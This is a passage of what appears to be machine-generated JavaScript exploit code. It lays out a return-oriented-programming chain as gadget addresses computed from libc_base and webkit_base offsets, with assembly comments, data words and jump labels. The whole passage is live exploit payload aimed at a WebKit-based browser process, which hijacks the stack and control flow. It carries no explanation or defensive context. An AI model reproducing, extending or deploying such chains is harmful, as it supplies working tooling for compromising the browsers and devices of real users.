libc_base+764760, //pop rsi ropchain+249456, //L4561 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4559: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4560: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4561: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+249528, //L4562 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4562: db([0, 0]); // 0x0 //L4530: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+249656, //L4565 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+249672, //L4566 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+249640, //L4564 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4564: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4565: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4566: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+249832, //L4571 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+249848, //L4572 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+249784, //L4568 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4568: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4569: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L4570: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4571: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4572: 
db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+249960, //L4573+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+249952, //L4573 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L4573: db([0, 0]); // 0x0 set_gadgets([ ropchain+249976, //L4573+24 ropchain+250928, //L4567 libc_base+764760, //pop rsi ropchain+250016, //L4574 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4574: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4576: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+250136, //L4579 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+250120, //L4577 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4577: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4579: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+250280, //L4582 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+250248, //L4580 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+250264, //L4581 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4580: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4581: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4582: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi 
libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+250376, //L4584 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4583: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L4584: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4585: db([32, 0]); // 0x20 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+250480, //L4586 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+250496, //L4587 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4586: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4587: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al webkit_base+5168252, //setl al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+250672, //L4589 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+250688, //L4590 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+250656, //L4588 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4588: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4589: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4590: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+250832, //L4593 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+250848, //L4594 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+250800, //L4591 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4591: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4592: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L4593: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4594: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+250920, //L4595 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4595: db([0, 0]); // 0x0 //L4567: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+251048, //L4598 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+251064, //L4599 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+251032, //L4597 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4597: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4598: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4599: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+251176, //L4601 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+251224, //L4604 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+251192, //L4602 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4601: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4602: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4603: db([0, 0]); // 0x0 
set_gadget(libc_base+759608,); //pop rax //L4604: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+251336, //L4605+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+251328, //L4605 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L4605: db([0, 0]); // 0x0 set_gadgets([ ropchain+251352, //L4605+24 ropchain+253376, //L4600 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+251392, //L4606 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4606: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4607: db([88, 0]); // 0x58 set_gadget(libc_base+144605,); //pop rdi //L4608: db([88, 0]); // 0x58 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+251584, //L4612 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+251552, //L4610 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+251568, //L4611 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4609: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L4610: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4611: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4612: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+251640, //L4614 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L4614: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+251768, //L4616 webkit_base+660161, //mov [rsi], rax ; 
mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+251784, //L4617 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+251752, //L4615 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4615: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4616: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4617: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+251880, //L4619 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+251864, //L4618 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4618: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4619: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+251960, //L4620 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4620: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4622: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+252080, //L4625 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+252064, //L4623 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4623: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4625: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+252224, //L4628 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi 
ropchain+252192, //L4626 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+252208, //L4627 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4626: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4627: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4628: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+252296, //L4630 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4630: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+252352, //L4631 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4631: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+252432, //L4633 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4633: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4635: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+252552, //L4638 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+252536, //L4636 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4636: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4638: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+252696, //L4641 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, 
//mov rax, rdi libc_base+764760, //pop rsi ropchain+252664, //L4639 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+252680, //L4640 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4639: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4640: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4641: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+252784, //L4643 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L4642: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L4643: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+252840, //L4644 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4644: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4646: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+252920, //L4648 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4648: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+253024, //L4649 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+253040, //L4650 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4649: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4650: db([0, 0]); // 0x0 set_gadgets([ 
libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+253128, //L4652 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4652: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+253184, //L4653 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4653: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+253256, //L4656 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4656: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+253312, //L4657 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4657: db([0, 0]); // 0x0 set_gadgets([ webkit_base+1121481, //mov [rax], cl libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+782311, //pop rsp ropchain+258080, //L4659 //L4600: libc_base+764760, //pop rsi ropchain+253416, //L4660 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4660: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4662: db([72, 0]); // 0x48 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+253536, //L4665 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+253520, //L4663 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4663: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4665: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+253712, //L4668 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+253728, //L4669 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+253680, //L4666 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+253696, //L4667 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4666: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4667: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4668: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4669: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+253888, //L4673 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+253856, //L4671 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+253872, //L4672 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4670: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L4671: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4672: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4673: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+253992, //L4675 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+253976, 
//L4674 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4674: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4675: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+254088, //L4677 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4676: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L4677: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4678: db([2, 0]); // 0x2 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+254192, //L4679 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+254208, //L4680 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4679: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4680: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+254376, //L4682 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+254392, //L4683 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+254360, //L4681 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4681: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4682: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4683: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, 
//movsxd rax, edi libc_base+764760, //pop rsi ropchain+254552, //L4688 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+254568, //L4689 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+254504, //L4685 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4685: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4686: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L4687: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4688: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4689: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+254680, //L4690+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+254672, //L4690 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L4690: db([0, 0]); // 0x0 set_gadgets([ ropchain+254696, //L4690+24 ropchain+255648, //L4684 libc_base+764760, //pop rsi ropchain+254736, //L4691 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4691: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4693: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+254856, //L4696 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+254840, //L4694 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4694: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4696: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov 
rax, [rdi] libc_base+764760, //pop rsi ropchain+255000, //L4699 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+254968, //L4697 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+254984, //L4698 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4697: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4698: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4699: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+255096, //L4701 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4700: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L4701: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4702: db([32, 0]); // 0x20 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+255200, //L4703 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+255216, //L4704 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4703: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4704: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al webkit_base+5168252, //setl al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+255392, //L4706 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+255408, 
//L4707 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+255376, //L4705 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4705: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4706: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4707: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+255552, //L4710 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+255568, //L4711 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+255520, //L4708 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4708: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4709: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L4710: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4711: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al 